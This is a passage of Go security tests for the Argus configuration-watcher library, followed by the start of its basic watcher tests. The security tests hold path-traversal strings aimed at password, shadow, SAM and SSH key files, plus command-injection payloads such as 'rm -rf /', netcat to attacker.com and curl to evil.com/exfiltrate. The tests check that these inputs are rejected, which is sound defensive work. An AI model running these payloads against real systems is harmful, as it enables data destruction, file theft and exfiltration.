	return ctx.CreateMaliciousFile(safeName, content, 0644)
}

// Cleanup restores environment and removes temporary files.
//
// SECURITY IMPORTANCE: Proper cleanup prevents test contamination and
// ensures security tests don't leave dangerous artifacts on the system.
func (ctx *SecurityTestContext) Cleanup() {
	ctx.mu.Lock()
	defer ctx.mu.Unlock()

	// Run custom cleanup functions first
	for _, fn := range ctx.cleanupFunctions {
		func() {
			defer func() {
				if r := recover(); r != nil {
					ctx.t.Logf("Warning: Cleanup function panicked: %v", r)
				}
			}()
			fn()
		}()
	}

	// Restore environment variables
	for key, originalValue := range ctx.originalEnv {
		if originalValue == "" {
			if err := os.Unsetenv(key); err != nil {
				ctx.t.Errorf("Failed to unset env %s: %v", key, err)
			}
		} else {
			if err := os.Setenv(key, originalValue); err != nil {
				ctx.t.Errorf("Failed to restore env %s: %v", key, err)
			}
		}
	}

	// Note: File cleanup is handled by t.TempDir() automatically
}

// AddCleanup registers a cleanup function to be called during test cleanup.
//
// SECURITY PURPOSE: Allows security tests to register custom cleanup logic
// for resources like network connections, databases, or system state changes.
func (ctx *SecurityTestContext) AddCleanup(fn func()) {
	ctx.mu.Lock()
	defer ctx.mu.Unlock()
	ctx.cleanupFunctions = append(ctx.cleanupFunctions, fn)
}

// =============================================================================
// PATH TRAVERSAL AND DIRECTORY TRAVERSAL SECURITY TESTS
// =============================================================================

// TestSecurity_PathTraversalAttacks tests for directory traversal vulnerabilities.
//
// ATTACK VECTOR: Path traversal (CWE-22)
// DESCRIPTION: Malicious actors attempt to access files outside the intended
// directory by using "../" sequences or equivalent techniques.
//
// IMPACT: If successful, attackers could read sensitive system files like
// /etc/passwd, /etc/shadow, Windows SAM files, or application secrets.
//
// MITIGATION EXPECTED: Argus should validate and sanitize file paths before
// using them, rejecting or normalizing dangerous path components.
func TestSecurity_PathTraversalAttacks(t *testing.T) {
	ctx := NewSecurityTestContext(t)

	// Define common path traversal attack patterns
	pathTraversalAttacks := []struct {
		name        string
		path        string
		description string
	}{
		{
			name:        "BasicUnixPathTraversal",
			path:        "../../../etc/passwd",
			description: "Basic Unix directory traversal attempt to access system password file",
		},
		{
			name:        "DeepUnixPathTraversal",
			path:        "../../../../../../../../etc/shadow",
			description: "Deep directory traversal with excessive ../ components",
		},
		{
			name:        "WindowsPathTraversal",
			path:        "..\\..\\..\\windows\\system32\\config\\sam",
			description: "Windows-style directory traversal to access SAM database",
		},
		{
			name:        "MixedPathSeparators",
			path:        "../..\\../etc/passwd",
			description: "Mixed path separators to bypass simple filtering",
		},
		{
			name:        "URLEncodedTraversal",
			path:        "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
			description: "URL-encoded path traversal to bypass string-based filters",
		},
		{
			name:        "DoubleEncodedTraversal",
			path:        "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd",
			description: "Double URL-encoded traversal for systems that decode twice",
		},
		{
			name:        "NullByteInjection",
			path:        "../../../etc/passwd\x00.config",
			description: "Null byte injection to truncate path and bypass extension validation",
		},
		{
			name:        "UnicodeNormalization",
			path:        "..\u002f..\u002f..\u002fetc\u002fpasswd",
			description: "Unicode normalization attack using alternative slash representations",
		},
	}

	for _, attack := range pathTraversalAttacks {
		t.Run(attack.name, func(t *testing.T) {
			// Create a watcher to test path validation
			watcher := New(Config{
				PollInterval: 100 * time.Millisecond,
				Audit:        AuditConfig{Enabled: false}, // Disable audit to focus on core vulnerability
			})
			defer func() {
				if err := watcher.Close(); err != nil {
					// Only log if the error is not "watcher is not running"
					if !strings.Contains(err.Error(), "watcher is not running") {
						t.Logf("Failed to close watcher: %v", err)
					}
				}
			}()

			// SECURITY TEST: Attempt to watch a file with malicious path
			// Expected behavior: This should fail with appropriate error
			err := watcher.Watch(attack.path, func(event ChangeEvent) {
				t.Errorf("SECURITY VULNERABILITY: Callback should never be called for malicious path: %s", attack.path)
			})

			// SECURITY ASSERTION: Path traversal should be rejected
			ctx.ExpectSecurityError(err, fmt.Sprintf("watching malicious path: %s (%s)", attack.path, attack.description))

			if err == nil {
				t.Logf("SECURITY CRITICAL: Path traversal was not blocked for: %s", attack.description)

				// If watch succeeded, test if it actually accesses the system file
				if err := watcher.Start(); err != nil {
					t.Logf("Failed to start watcher: %v", err)
				}
				time.Sleep(200 * time.Millisecond) // Allow some processing time
				if err := watcher.Stop(); err != nil {
					t.Errorf("Failed to stop watcher: %v", err)
				}

				// Log detailed security analysis
				t.Errorf("SECURITY VULNERABILITY CONFIRMED: Argus accepted malicious path '%s' which could lead to unauthorized file access. Attack: %s",
					attack.path, attack.description)
			}
		})
	}
}

// TestSecurity_PathValidationBypass tests attempts to bypass path validation.
//
// ATTACK VECTOR: Path validation bypass (CWE-23)
// DESCRIPTION: Sophisticated attackers may try to bypass path validation
// using encoding, normalization, or other techniques not covered by basic filters.
//
// This test focuses on advanced bypass techniques that might evade
// simple string-based or regex-based path validation.
func TestSecurity_PathValidationBypass(t *testing.T) {
	ctx := NewSecurityTestContext(t)

	// Advanced path traversal bypass techniques
	bypassAttempts := []struct {
		name        string
		path        string
		description string
	}{
		{
			name:        "SymlinkTraversal",
			path:        ctx.tempDir + "/malicious_symlink", // Will create symlink to /etc/passwd
			description: "Symlink-based traversal to access files outside intended directory",
		},
		{
			name:        "OverlongPathComponents",
			path:        strings.Repeat("../", 100) + "etc/passwd",
			description: "Overlong path with excessive traversal components to cause buffer issues",
		},
		{
			name:        "PathNormalizationAttack",
			path:        "./../../etc/passwd",
			description: "Path normalization attack using current directory references",
		},
		{
			name:        "WindowsDeviceNames",
			path:        "CON",
			description: "Windows device name that could cause DoS or unexpected behavior",
		},
		{
			name:        "WindowsAlternateDataStream",
			path:        "config.txt:hidden_stream",
			description: "Windows alternate data stream to hide malicious content",
		},
	}

	for _, bypass := range bypassAttempts {
		t.Run(bypass.name, func(t *testing.T) {
			// Special setup for symlink test
			if bypass.name == "SymlinkTraversal" {
				// Create malicious symlink pointing to system file
				symlinkPath := bypass.path
				targetPath := "/etc/passwd" // Unix system file

				// Create symlink in safe temp directory
				err := os.Symlink(targetPath, symlinkPath)
				if err != nil && !os.IsExist(err) {
					t.Skip("Cannot create symlink for test (may require permissions)")
				}
			}

			watcher := New(Config{
				PollInterval: 100 * time.Millisecond,
				Audit:        AuditConfig{Enabled: false},
			})
			defer func() {
				if err := watcher.Close(); err != nil {
					// Only log if the error is not "watcher is not running"
					// This is expected for security tests where Watch() fails
					if !strings.Contains(err.Error(), "watcher is not running") {
						t.Errorf("Failed to close watcher: %v", err)
					}
				}
			}()

			// SECURITY TEST: Attempt path validation bypass
			err := watcher.Watch(bypass.path, func(event ChangeEvent) {
				t.Errorf("SECURITY VULNERABILITY: Callback executed for bypass attempt: %s", bypass.path)
			})

			// SECURITY ASSERTION: Bypass attempts should fail
			ctx.ExpectSecurityError(err, fmt.Sprintf("path validation bypass: %s (%s)", bypass.path, bypass.description))

			if err == nil {
				t.Errorf("SECURITY VULNERABILITY: Path validation bypass succeeded for: %s - %s",
					bypass.path, bypass.description)
			}
		})
	}
}

// =============================================================================
// RESOURCE EXHAUSTION AND DENIAL OF SERVICE TESTS
// =============================================================================

// TestSecurity_ResourceExhaustionAttacks tests for DoS via resource exhaustion.
//
// ATTACK VECTOR: Resource exhaustion (CWE-400)
// DESCRIPTION: Attackers attempt to consume excessive system resources
// (memory, file descriptors, CPU) to cause denial of service.
//
// IMPACT: Could cause application crashes, system instability, or service
// unavailability affecting legitimate users.
//
// MITIGATION EXPECTED: Argus should implement proper resource limits and
// gracefully handle resource exhaustion scenarios.
func TestSecurity_ResourceExhaustionAttacks(t *testing.T) {
	ctx := NewSecurityTestContext(t)

	t.Run("MaxWatchedFilesExhaustion", func(t *testing.T) {
		// SECURITY TEST: Attempt to exceed MaxWatchedFiles limit
		// This tests whether Argus properly enforces resource limits

		watcher := New(Config{
			PollInterval:    100 * time.Millisecond,
			MaxWatchedFiles: 5, // Intentionally low limit for testing
			Audit:           AuditConfig{Enabled: false},
		})
		defer func() {
			if err := watcher.Close(); err != nil {
				// Only log if the error is not "watcher is not running"
				// This is expected for security tests where operations fail
				if !strings.Contains(err.Error(), "watcher is not running") {
					t.Errorf("Failed to close watcher: %v", err)
				}
			}
		}()

		// Add files up to the limit
		for i := 0; i < 5; i++ {
			filePath := ctx.CreateMaliciousFile(fmt.Sprintf("file_%d.txt", i), []byte("test"), 0644)
			err := watcher.Watch(filePath, func(event ChangeEvent) {})
			ctx.ExpectSecuritySuccess(err, fmt.Sprintf("watching file %d within limit", i))
		}

		// SECURITY TEST: Attempt to exceed the limit
		extraFilePath := ctx.CreateMaliciousFile("extra_file.txt", []byte("test"), 0644)
		err := watcher.Watch(extraFilePath, func(event ChangeEvent) {})

		// SECURITY ASSERTION: Should reject request exceeding limit
		ctx.ExpectSecurityError(err, "watching file beyond MaxWatchedFiles limit")

		if err == nil {
			t.Error("SECURITY VULNERABILITY: MaxWatchedFiles limit was not enforced - potential DoS vector")
		}
	})

	t.Run("MemoryExhaustionViaLargeConfigs", func(t *testing.T) {
		// SECURITY TEST: Attempt memory exhaustion via large configuration files
		// Large configs could cause excessive memory allocation during parsing

		// Create a very large configuration file (10MB of JSON)
		largeConfigSize := 10 * 1024 * 1024 // 10MB
		largeConfig := make([]byte, largeConfigSize)

		// Fill with valid JSON to test parser memory usage
		jsonPattern := `{"key_%d": "value_%d", `
		pos := 0
		counter := 0
		largeConfig[pos] = '{'
		pos++

		for pos < largeConfigSize-100 {
			part := fmt.Sprintf(jsonPattern, counter, counter)
			if pos+len(part) >= largeConfigSize-100 {
				break
			}
			copy(largeConfig[pos:], part)
			pos += len(part)
			counter++
		}

		// Close JSON properly
		copy(largeConfig[pos:], `"end": "end"}`)

		largePath := ctx.CreateMaliciousFile("large_config.json", largeConfig, 0644)

		watcher := New(Config{
			PollInterval: 100 * time.Millisecond,
			Audit:        AuditConfig{Enabled: false},
		})
		defer func() {
			if err := watcher.Close(); err != nil {
				// Only log if the error is not "watcher is not running"
				if !strings.Contains(err.Error(), "watcher is not running") {
					t.Logf("Failed to close watcher: %v", err)
				}
			}
		}()

		// SECURITY TEST: Watch large file and measure resource usage
		var memBefore, memAfter uint64

		// Measure memory before
		memBefore = getCurrentMemoryUsage()

		err := watcher.Watch(largePath, func(event ChangeEvent) {
			// Parse the large config to trigger potential memory issues
			_, parseErr := ParseConfig(largeConfig, FormatJSON)
			if parseErr != nil {
				t.Logf("Large config parsing failed (expected): %v", parseErr)
			}
		})

		if err == nil {
			if err := watcher.Start(); err != nil {
				t.Logf("Failed to start watcher: %v", err)
			}

			// Trigger file change to test parsing memory usage
			ctx.CreateMaliciousFile("large_config.json", append(largeConfig, []byte(" ")...), 0644)

			time.Sleep(500 * time.Millisecond) // Allow processing

			// Measure memory after
			memAfter = getCurrentMemoryUsage()

			if err := watcher.Stop(); err != nil {
				t.Errorf("Failed to stop watcher: %v", err)
			}

			// SECURITY ANALYSIS: Check for reasonable memory usage
			memDiff := memAfter - memBefore
			if memDiff > 50*1024*1024 { // More than 50MB increase
				t.Errorf("SECURITY WARNING: Large config caused excessive memory usage: %d bytes increase", memDiff)
			}
		}
	})

	t.Run("FileDescriptorExhaustion", func(t *testing.T) {
		// SECURITY TEST: Attempt to exhaust file descriptors
		// This could cause system-wide issues if not properly managed

		watcher := New(Config{
			PollInterval:    50 * time.Millisecond, // Aggressive polling
			MaxWatchedFiles: 100,
			Audit:           AuditConfig{Enabled: false},
		})
		defer func() {
			if err := watcher.Close(); err != nil {
				// Only log if the error is not "watcher is not running"
				if !strings.Contains(err.Error(), "watcher is not running") {
					t.Logf("Failed to close watcher: %v", err)
				}
			}
		}()

		// Create many files and watch them to test FD usage
		for i := 0; i < 50; i++ { // Test with moderate number
			filePath := ctx.CreateMaliciousFile(fmt.Sprintf("fd_test_%d.txt", i), []byte("test"), 0644)

			err := watcher.Watch(filePath, func(event ChangeEvent) {})
			if err != nil {
				t.Logf("Could not watch file %d (may have hit system limits): %v", i, err)
				break
			}
		} // Start intensive polling to test FD management
		if err := watcher.Start(); err != nil {
			t.Logf("Failed to start watcher: %v", err)
		}
		time.Sleep(1 * time.Second) // Allow intensive polling
		if err := watcher.Stop(); err != nil {
			t.Logf("Failed to stop watcher: %v", err)
		}

		// SECURITY CHECK: Create new watcher to test FD recovery
		newWatcher := New(Config{
			PollInterval:    100 * time.Millisecond,
			MaxWatchedFiles: 100,
		})

		testFile := ctx.CreateMaliciousFile("fd_recovery_test.txt", []byte("test"), 0644)
		err := newWatcher.Watch(testFile, func(event ChangeEvent) {})
		ctx.ExpectSecuritySuccess(err, "file descriptor recovery after intensive usage")

		// Clean up new watcher
		_ = newWatcher.Stop()
	})
}

// Helper function to get current memory usage (simplified for testing)
func getCurrentMemoryUsage() uint64 {
	// In a real implementation, this would use runtime.MemStats
	// For testing purposes, we return a placeholder value
	return 0 // This should be implemented properly for production security testing
}

// =============================================================================
// ENVIRONMENT VARIABLE INJECTION TESTS
// =============================================================================

// TestSecurity_EnvironmentVariableInjection tests for env var injection vulnerabilities.
//
// ATTACK VECTOR: Environment variable injection (CWE-74)
// DESCRIPTION: Attackers manipulate environment variables to inject malicious
// values into the application, potentially bypassing security controls.
//
// IMPACT: Could lead to configuration tampering, privilege escalation,
// or execution of unintended commands if environment values are used unsafely.
//
// This is particularly dangerous in containerized environments where
// environment variables are commonly used for configuration.
func TestSecurity_EnvironmentVariableInjection(t *testing.T) {
	ctx := NewSecurityTestContext(t)

	t.Run("PathInjectionViaEnvironment", func(t *testing.T) {
		// SECURITY TEST: Inject malicious paths via environment variables
		// Tests whether env config loading properly validates path values

		maliciousPaths := []string{
			"../../../etc/passwd",
			"/proc/self/environ",
			"\\..\\..\\..\\windows\\system32\\config\\sam",
			"/dev/random", // Could cause DoS if read from
			"CON",         // Windows device name
			"/proc/1/mem", // Kernel memory access attempt
		}

		for _, maliciousPath := range maliciousPaths {
			t.Run(fmt.Sprintf("Path_%s", strings.ReplaceAll(maliciousPath, "/", "_")), func(t *testing.T) {
				// Set malicious audit output file via environment
				ctx.SetMaliciousEnvVar("ARGUS_AUDIT_OUTPUT_FILE", maliciousPath)

				// SECURITY TEST: Attempt to load config with malicious path
				config, err := LoadConfigFromEnv()

				if err == nil && config != nil {
					// If config loaded successfully, check if it contains the malicious path
					if config.Audit.OutputFile == maliciousPath {
						t.Errorf("SECURITY VULNERABILITY: Malicious path accepted via environment variable: %s", maliciousPath)
					} else {
						t.Logf("SECURITY GOOD: Environment path was sanitized or rejected")
					}
				} else {
					t.Logf("SECURITY GOOD: Configuration loading failed with malicious path (expected)")
				}
			})
		}
	})

	t.Run("CommandInjectionViaEnvironment", func(t *testing.T) {
		// SECURITY TEST: Attempt command injection via environment variables
		// Tests whether any env values are unsafely passed to system commands

		commandInjectionPayloads := []string{
			"; rm -rf /",
			"| nc attacker.com 443",
			"&& curl http://evil.com/exfiltrate",
			"`whoami`",
			"$(id)",
			"%SYSTEMROOT%\\System32\\calc.exe",
			"; powershell.exe -ExecutionPolicy Bypass",
		}

		for _, payload := range commandInjectionPayloads {
			t.Run(fmt.Sprintf("Injection_%d", len(payload)), func(t *testing.T) {
				// Test injection in various environment variables
				envVars := []string{
					"ARGUS_REMOTE_URL",
					"ARGUS_AUDIT_OUTPUT_FILE",
					"ARGUS_VALIDATION_SCHEMA",
				}

				for _, envVar := range envVars {
					ctx.SetMaliciousEnvVar(envVar, payload)

					// SECURITY TEST: Load config and ensure payload is not executed
					config, err := LoadConfigFromEnv()

					// SECURITY ANALYSIS: Even if config loads, payload should not execute
					if err == nil && config != nil {
						// Verify that the payload wasn't interpreted as a command
						// In a real test, we would check for signs of command execution
						t.Logf("Config loaded with potential injection payload in %s - verify no execution occurred", envVar)
					}
				}
			})
		}
	})

	t.Run("ConfigurationOverrideAttacks", func(t *testing.T) {
		// SECURITY TEST: Attempt to override security-critical configurations
		// Tests whether attackers can disable security features via environment

		securityOverrides := []struct {
			envVar         string
			maliciousValue string
			description    string
		}{
			{"ARGUS_AUDIT_ENABLED", "false", "Attempt to disable audit logging"},
			{"ARGUS_MAX_WATCHED_FILES", "999999", "Attempt to bypass file watching limits"},
			{"ARGUS_POLL_INTERVAL", "1ns", "Attempt to cause excessive CPU usage via rapid polling"},
			{"ARGUS_CACHE_TTL", "0", "Attempt to disable caching and cause performance DoS"},
			{"ARGUS_BOREAS_CAPACITY", "1", "Attempt to cripple event processing capacity"},
		}

		for _, override := range securityOverrides {
			t.Run(override.envVar, func(t *testing.T) {
				ctx.SetMaliciousEnvVar(override.envVar, override.maliciousValue)

				config, err := LoadConfigFromEnv()

				if err == nil && config != nil {
					// SECURITY ANALYSIS: Check if dangerous overrides were applied
					switch override.envVar {
					case "ARGUS_AUDIT_ENABLED":
						if !config.Audit.Enabled {
							t.Errorf("SECURITY VULNERABILITY: %s - Audit logging was disabled via environment", override.description)
						}
					case "ARGUS_MAX_WATCHED_FILES":
						if config.MaxWatchedFiles > 1000 {
							t.Errorf("SECURITY WARNING: %s - Excessive MaxWatchedFiles limit set: %d", override.description, config.MaxWatchedFiles)
						}
					case "ARGUS_POLL_INTERVAL":
						if config.PollInterval < time.Millisecond {
							t.Errorf("SECURITY WARNING: %s - Dangerously low poll interval: %v", override.description, config.PollInterval)
						}
					}
				}
			})
		}
	})
}

// TestSecurity_ValidateSecurePath tests the validateSecurePath function comprehensively
// including the case-insensitivity fix for consistent security validation.
func TestSecurity_ValidateSecurePath(t *testing.T) {
	tests := []struct {
		name          string
		path          string
		shouldFail    bool
		expectedError string
		description   string
	}{
		// Basic valid paths
		{
			name:        "ValidSimplePath",
			path:        "config.json",
			shouldFail:  false,
			description: "Simple filename should be allowed",
		},
		{
			name:        "ValidRelativePath",
			path:        "configs/app.yaml",
			shouldFail:  false,
			description: "Valid relative path should be allowed",
		},
		{
			name:        "ValidAbsolutePath",
			path:        "/etc/argus/config.json",
			shouldFail:  false,
			description: "Valid absolute path should be allowed",
		},

		// Edge cases
		{
			name:          "EmptyPath",
			path:          "",
			shouldFail:    true,
			expectedError: "empty path not allowed",
			description:   "Empty paths should be rejected",
		},

		// Path traversal attacks - case sensitive patterns
		{
			name:          "BasicParentDir",
			path:          "..",
			shouldFail:    true,
			expectedError: "dangerous traversal pattern",
			description:   "Parent directory reference should be blocked",
		},
		{
			name:          "UnixTraversal",
			path:          "../../../etc/passwd",
			shouldFail:    true,
			expectedError: "dangerous traversal pattern",
			description:   "Unix path traversal should be blocked",
		},
		{
			name:          "WindowsTraversal",
			path:          "..\\..\\windows\\system32\\config\\sam",
			shouldFail:    true,
			expectedError: "dangerous traversal pattern",
			description:   "Windows path traversal should be blocked",
		},
		{
			name:          "AbsoluteTraversal",
			path:          "/var/www/../../../etc/passwd",
			shouldFail:    true,
			expectedError: "dangerous traversal pattern",
			description:   "Absolute path with traversal should be blocked",
		},

		// Case sensitivity tests - CRITICAL for the fix
		{
			name:          "UppercaseTraversal",
			path:          "../../../ETC/PASSWD",
			shouldFail:    true,
			expectedError: "dangerous traversal pattern",
			description:   "Uppercase path traversal should be blocked (case-insensitive)",
		},
		{
			name:          "MixedCaseTraversal",
			path:          "../../../Etc/Passwd",
			shouldFail:    true,
			expectedError: "dangerous traversal pattern",
			description:   "Mixed case path traversal should be blocked (case-insensitive)",
		},
		{
			name:          "UppercaseWindowsTraversal",
			path:          "..\\..\\WINDOWS\\SYSTEM32",
			shouldFail:    true,
			expectedError: "dangerous traversal pattern",
			description:   "Uppercase Windows traversal should be blocked (case-insensitive)",
		},

		// URL-encoded attacks
		{
			name:          "URLEncodedDots",
			path:          "%2e%2e/%2e%2e/etc/passwd",
			shouldFail:    true,
			expectedError: "URL-encoded traversal pattern",
			description:   "URL-encoded dots should be detected",
		},
		{
			name:          "DoubleEncodedDots",
			path:          "%252e%252e/etc/passwd",
			shouldFail:    true,
			expectedError: "URL-encoded traversal pattern",
			description:   "Double URL-encoded dots should be detected",
		},
		{
			name:          "MixedEncodingAttack",
			path:          "..%2fetc%2fpasswd",
			shouldFail:    true,
			expectedError: "dangerous traversal pattern",
			description:   "Mixed encoding attacks should be detected (caught by traversal pattern first)",
		},

		// System file protection - case insensitive
		{
			name:          "EtcPasswd",
			path:          "/etc/passwd",
			shouldFail:    true,
			expectedError: "system file/directory not allowed",
			description:   "Access to /etc/passwd should be blocked",
		},
		{
			name:          "EtcPasswdUppercase",
			path:          "/ETC/PASSWD",
			shouldFail:    true,
			expectedError: "system file/directory not allowed",
			description:   "Access to /ETC/PASSWD should be blocked (case-insensitive)",
		},
		{
			name:          "WindowsSystem32",
			path:          "C:\\Windows\\System32\\config\\sam",
			shouldFail:    true,
			expectedError: "system file/directory not allowed",
			description:   "Access to Windows system files should be blocked",
		},
		{
			name:          "WindowsSystem32Uppercase",
			path:          "C:\\WINDOWS\\SYSTEM32\\CONFIG\\SAM",
			shouldFail:    true,
			expectedError: "system file/directory not allowed",
			description:   "Access to WINDOWS\\SYSTEM32 should be blocked (case-insensitive)",
		},

		// Windows device names
		{
			name:          "WindowsDeviceCON",
			path:          "CON",
			shouldFail:    true,
			expectedError: "windows device name not allowed",
			description:   "Windows device name CON should be blocked",
		},
		{
			name:          "WindowsDevicePRN",
			path:          "prn.txt",
			shouldFail:    true,
			expectedError: "windows device name not allowed",
			description:   "Windows device name PRN should be blocked",
		},
		{
			name:          "WindowsDeviceCOM1",
			path:          "com1.log",
			shouldFail:    true,
			expectedError: "windows device name not allowed",
			description:   "Windows device name COM1 should be blocked",
		},

		// Alternate Data Streams
		{
			name:          "AlternateDataStream",
			path:          "file.txt:hidden",
			shouldFail:    true,
			expectedError: "alternate data streams not allowed",
			description:   "Windows Alternate Data Streams should be blocked",
		},

		// Path length limits
		{
			name:          "ExcessivelyLongPath",
			path:          strings.Repeat("a", 5000),
			shouldFail:    true,
			expectedError: "path too long",
			description:   "Excessively long paths should be rejected",
		},
		{
			name:          "DeeplyNestedPath",
			path:          strings.Repeat("a/", 60),
			shouldFail:    true,
			expectedError: "path too complex",
			description:   "Deeply nested paths should be rejected",
		},

		// Control characters
		{
			name:          "NullByteInjection",
			path:          "config.json\x00.txt",
			shouldFail:    true,
			expectedError: "null byte in path not allowed",
			description:   "Null byte injection should be blocked",
		},
		{
			name:          "ControlCharacterInjection",
			path:          "config\x01.json",
			shouldFail:    true,
			expectedError: "control character in path not allowed",
			description:   "Control characters should be blocked",
		},

		// Edge cases that should be allowed
		{
			name:        "ValidDotFile",
			path:        ".gitignore",
			shouldFail:  false,
			description: "Valid dot files should be allowed",
		},
		{
			name:        "ValidWindowsDrive",
			path:        "C:\\configs\\app.json",
			shouldFail:  false,
			description: "Valid Windows drive paths should be allowed",
		},
		{
			name:        "ValidURLScheme",
			path:        "http://example.com/config",
			shouldFail:  false,
			description: "Valid URL schemes should be allowed",
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			err := ValidateSecurePath(tt.path)

			if tt.shouldFail {
				if err == nil {
					t.Errorf("ValidateSecurePath(%q) should have failed but didn't. %s",
						tt.path, tt.description)
					return
				}
				if tt.expectedError != "" && !strings.Contains(err.Error(), tt.expectedError) {
					t.Errorf("ValidateSecurePath(%q) error = %v, want error containing %q. %s",
						tt.path, err, tt.expectedError, tt.description)
				}
			} else {
				if err != nil {
					t.Errorf("ValidateSecurePath(%q) should not have failed but got error: %v. %s",
						tt.path, err, tt.description)
				}
			}
		})
	}

	// Additional case sensitivity consistency test
	t.Run("CaseSensitivityConsistency", func(t *testing.T) {
		// Test that both upper and lower case versions of dangerous patterns are caught
		dangerousPairs := []struct {
			lower, upper string
		}{
			{"../../../etc/passwd", "../../../ETC/PASSWD"},
			{"..\\windows\\system32", "..\\WINDOWS\\SYSTEM32"},
			{"/proc/self/environ", "/PROC/SELF/ENVIRON"},
			{"config/.ssh/id_rsa", "CONFIG/.SSH/ID_RSA"},
		}

		for _, pair := range dangerousPairs {
			lowerErr := ValidateSecurePath(pair.lower)
			upperErr := ValidateSecurePath(pair.upper) // Both should fail (or both should pass)
			if (lowerErr == nil) != (upperErr == nil) {
				t.Errorf("Case sensitivity inconsistency: lower=%q (err=%v), upper=%q (err=%v)",
					pair.lower, lowerErr, pair.upper, upperErr)
			}
		}
	})
}

```

## /argus_test.go

```go path="/argus_test.go" 
// argus_test.go - Comprehensive test suite for Argus Dynamic Configuration Framework
//
// Copyright (c) 2025 AGILira - A. Giordano
// Series: an AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"os"
	"path/filepath"
	"sync"
	"testing"
	"time"
)

// TestWatcherBasicFunctionality tests the core watcher functionality
func TestWatcherBasicFunctionality(t *testing.T) {
	// Create temporary test file
	tmpDir := t.TempDir()
	testFile := filepath.Join(tmpDir, "test_config.json")

	// Write initial content
	initialContent := `{"level": "info"}`
	if err := os.WriteFile(testFile, []byte(initialContent), 0644); err != nil {
		t.Fatalf("Failed to create test file: %v", err)
	}

	// Create watcher with short intervals for testing
	watcher := New(Config{
		PollInterval: 100 * time.Millisecond,
		CacheTTL:     50 * time.Millisecond,
	})

	// Track changes with mutex for race-safe access
	var mu sync.Mutex
	changeCount := 0
	var lastEvent ChangeEvent

	err := watcher.Watch(testFile, func(event ChangeEvent) {
		mu.Lock()
		changeCount++
		lastEvent = event
		mu.Unlock()
	})
	if err != nil {
		t.Fatalf("Failed to watch file: %v", err)
	}

	// Start watcher
	if err := watcher.Start(); err != nil {
		t.Fatalf("Failed to start watcher: %v", err)
	}
	defer func() { _ = watcher.Stop() }() // Ignore cleanup errors in tests

	// Wait a bit to ensure initial scan
	time.Sleep(150 * time.Millisecond)
	mu.Lock()
	initialCount := changeCount
	mu.Unlock()

	// Modify the file
	modifiedContent := `{"level": "debug"}`
	if err := os.WriteFile(testFile, []byte(modifiedContent), 0644); err != nil {
		t.Fatalf("Failed to modify test file: %v", err)
	}

	// Wait for change detection
	time.Sleep(200 * time.Millisecond)

	// Verify change was detected
	mu.Lock()
	currentCount := changeCount
	currentEvent := lastEvent
	mu.Unlock()

	if currentCount <= initialCount {
		t.Errorf("Expected change to be detected, changeCount: %d, initialCount: %d", currentCount, initialCount)
	}

	if !currentEvent.IsModify {
		t.Errorf("Expected modify event, got: %+v", currentEvent)
	}

	if currentEvent.Path != testFile {
		t.Errorf("Expected path %s, got %s", testFile, currentEvent.Path)
	}
}

// TestWatcherCaching tests the caching mechanism
func TestWatcherCaching(t *testing.T) {
	tmpDir := t.TempDir()
	testFile := filepath.Join(tmpDir, "cache_test.json")

	if err := os.WriteFile(testFile, []byte(`{"test": true}`), 0644); err != nil {
		t.Fatalf("Failed to create test file: %v", err)
	}

	watcher := New(Config{
		PollInterval: 1 * time.Second, // Long interval
		CacheTTL:     500 * time.Millisecond,
	})

	// Get stat twice quickly - should use cache
	stat1, err1 := watcher.getStat(testFile)
	if err1 != nil {
		t.Fatalf("First getStat failed: %v", err1)
	}

	stat2, err2 := watcher.getStat(testFile)
	if err2 != nil {
		t.Fatalf("Second getStat failed: %v", err2)
	}

	// Should be identical (from cache)
	if stat1.cachedAt != stat2.cachedAt {
		t.Errorf("Expected cached result, but got different cache times")
	}

	// Wait for cache to expire
	time.Sleep(600 * time.Millisecond)

	stat3, err3 := watcher.getStat(testFile)
	if err3 != nil {
		t.Fatalf("Third getStat failed: %v", err3)
	}

	// Should be different (cache expired)
	if stat1.cachedAt == stat3.cachedAt {
		t.Errorf("Expected cache to expire, but got same cache time")
	}
}

// TestWatcherFileCreationDeletion tests file creation and deletion events
func TestWatcherFileCreationDeletion(t *testing.T) {
	tmpDir := t.TempDir()
	testFile := filepath.Join(tmpDir, "create_delete_test.json")

	// Use slower polling for macOS CI reliability
	watcher := New(Config{
		PollInterval: 250 * time.Millisecond, // Slower polling for macOS CI
		CacheTTL:     100 * time.Millisecond, // Longer cache for stability
	})

	events := []ChangeEvent{}
	var eventsMutex sync.Mutex
	err := watcher.Watch(testFile, func(event ChangeEvent) {
		eventsMutex.Lock()
		events = append(events, event)
		t.Logf("Event received: IsCreate=%v, IsDelete=%v, IsModify=%v, Path=%s",
			event.IsCreate, event.IsDelete, event.IsModify, event.Path)
		eventsMutex.Unlock()
	})
	if err != nil {
		t.Fatalf("Failed to watch file: %v", err)
	}

	if err := watcher.Start(); err != nil {
		t.Fatalf("Failed to start watcher: %v", err)
	}
	defer func() { _ = watcher.Stop() }() // Ignore cleanup errors in tests

	// Ensure watcher is running
	if !watcher.IsRunning() {
		t.Fatalf("Watcher should be running")
	}

	// Extended setup time for macOS CI environments - reduced for timeout constraints
	t.Logf("Waiting for watcher setup...")
	time.Sleep(500 * time.Millisecond) // Reduced from 1 second

	t.Logf("Creating file: %s", testFile)
	// Create the file
	if err := os.WriteFile(testFile, []byte(`{"created": true}`), 0644); err != nil {
		t.Fatalf("Failed to create test file: %v", err)
	}

	// Wait for create event with reduced timeout for CI constraints
	maxWait := 20 // 20 * 250ms = 5 seconds max (reduced from 10s)
	for i := 0; i < maxWait; i++ {
		eventsMutex.Lock()
		currentEvents := len(events)
		hasCreate := false
		for _, e := range events {
			if e.IsCreate || (!e.IsDelete && e.Path == testFile) {
				hasCreate = true
				break
			}
		}
		eventsMutex.Unlock()

		if hasCreate {
			t.Logf("Create event detected after %d attempts, total events: %d", i+1, currentEvents)
			break
		}
		time.Sleep(250 * time.Millisecond)
	}

	// Give time between operations - reduced for timeout constraints
	time.Sleep(500 * time.Millisecond) // Reduced from 1 second

	t.Logf("Deleting file: %s", testFile)
	// Delete the file
	if err := os.Remove(testFile); err != nil {
		t.Fatalf("Failed to delete test file: %v", err)
	}

	// Wait for delete event with extended retry for macOS CI
	for i := 0; i < maxWait; i++ {
		eventsMutex.Lock()
		currentEvents := len(events)
		hasDelete := false
